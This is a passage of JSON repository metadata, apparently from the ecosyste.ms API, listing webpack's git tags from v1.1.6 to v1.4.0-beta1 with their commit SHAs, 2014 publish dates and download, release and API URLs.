kg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.